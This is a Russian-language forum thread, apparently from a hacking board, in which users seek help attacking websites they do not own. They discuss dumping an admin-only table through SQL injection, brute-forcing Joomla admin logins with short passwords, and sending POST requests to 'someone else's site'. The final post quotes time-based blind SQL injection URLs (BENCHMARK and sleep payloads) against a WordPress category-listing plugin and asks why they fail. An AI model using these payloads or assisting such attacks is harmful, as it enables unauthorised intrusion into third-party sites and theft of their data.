Есть скуля типа

При вводе урла типа

На выходе получаю дамп таблицы к которой(таблице) иеет доступ только админ сайта. Можно ли как то узнать версию mysql и имя бд? Спасибо.

ограничений вроде как нет.

Дефолтный логин - admin

ну добавлю и admin и администратор)

т.е можно начинать со всех 1-2-3 символьных паролей брут?

на джумле везде токены есть?

неправда. У id =62 логин admin, логина administrator по умолчанию в Joomla нету.

Начиная с версии 1.5

а у токенов всегда одинаковый формат?

или где-то будет по другому?

одинаковый. Вида мд5, 32 символа.

чем отправлять post запрос на сайт чужой?

Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,

Плагин на exploit-db

Poc: http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)--%20

Я запрашиваю:

1)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(ble sse()))),0)--%20

2)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20

Какой либо задержки в обоих случаях не последовало.

Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?